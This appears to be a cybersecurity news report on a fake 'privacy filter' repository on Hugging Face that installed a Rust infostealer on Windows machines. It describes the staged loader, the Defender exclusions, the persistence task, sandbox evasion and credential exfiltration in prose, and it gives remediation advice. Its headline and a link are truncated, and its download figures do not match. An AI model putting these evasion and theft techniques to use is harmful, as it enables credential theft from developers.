Hugging Face Repo with 200k Downloads Inst Trending Repository

A trending artificial intelligence repository on Hugging Face, boasting over 200,000 downloads, was recently discovered to be distributing dangerous malware. This malicious code specifically targets Windows users, a concerning development detailed in a new analysis [https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/1

The repository, named “Open-OSS/privacy-filter,” had racked up over 200,000 downloads before the platform’s team stepped in and removed it.

The malicious package disguised itself as a legitimate privacy filtering tool. It copied its model card nearly verbatim from OpenAI’s own Privacy Filter project, giving it a convincing, trustworthy appearance.

Thousands of developers and researchers downloaded it without any suspicion, thinking they were working with a well-regarded and reliable AI utility.

Researchers at Hidden Layer identified the malicious code buried deep inside the repository. Their analysis revealed a sophisticated, multi-stage attack chain carefully designed to steal sensitive data from Windows machines and stay hidden throughout the entire process.

The attack did not announce itself in any way. Instead, it quietly executed in the background, using a loader file that mimicked the look and behavior of a legitimate AI model tool. Once a user ran it on a Windows machine, the real damage began without any visible warning signs.

The reach of this campaign was not accidental. Before access to the repository was disabled, it had already climbed to the number one trending position on Hugging Face, with approximately 244 downloads and 77 likes in under one hour. Those numbers were almost certainly inflated artificially to push the repository into the spotlight and attract more victims.

Trending Hugging Face Repository Executes Malware

The attack chain unfolded across six distinct stages. In the first stage, the model card instructed users to clone the repository and run a startbat file on Windows, or a Python loaderpy script on Linux or macOS.

When executed on Windows, the loaderpy script ran a decoy piece of code that looked like a real loader, then called a function named verifychecksumintegrity, which disabled SSL verification, decoded a base64-encoded URL pointing to jsonkeeper.com, fetched a JSON document, and extracted the cmd field. That command was passed directly to PowerShell, running silently with execution policy bypassed.

The second stage involved PowerShell downloading a batch file called updatebat from a domain mimicking a blockchain analytics service, api.eth-fastscan.org. The batch file performed six core actions, including admin checks, payload downloads, and adding Microsoft Defender exclusions for the directories where the malicious executable was dropped.

A scheduled task named MicrosoftEdgeUpdateTaskCore was also created to maintain persistence, though it was designed as a one-shot launcher that deleted itself after running, leaving no obvious trace behind.

The Infostealer Payload and Credential Theft

The final payload was a 10 MB Rust-based infostealer with an impressive range of capabilities. It specifically targeted Windows API calls to defeat static analysis and ran checks to detect debuggers, sandboxes, and virtual machines, including VirtualBox, VMware, Hyper-V, and Parallels. If it detected those environments, it simply stopped running.

Once active on a real machine, it launched eight parallel collection modules that targeted Chrome and Firefox browser cookies, login data, saved passwords, session cookies, SSH keys, VPN configurations, FTP credentials, and cryptocurrency wallet files. Screenshots were also captured and packaged for exfiltration. All stolen data was compressed and sent to a command-and-control server at recargapopular.com using a POST request with a Bearer token authorization header.

Hidden Layer’s telemetry also linked the same attacker account to six other repositories uploaded on April 24, 2025, all containing nearly identical loader functionality. The shared infrastructure between those repositories and the Open-OSS/privacy-filter campaign strongly suggested this was part of a broader, coordinated supply chain operation targeting open-source AI ecosystems.

Anyone who downloaded or cloned Open-OSS/privacy-filter, or any of the related repositories listed in the IOCs table below, should treat the affected system as fully compromised.

Recommended actions include isolating the host immediately, rotating every credential stored in browsers, password managers, or credential stores on that machine, and revoking any cloud provider tokens or SSH keys that may have been present. Reimaging the host is strongly advised before returning it to production use.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.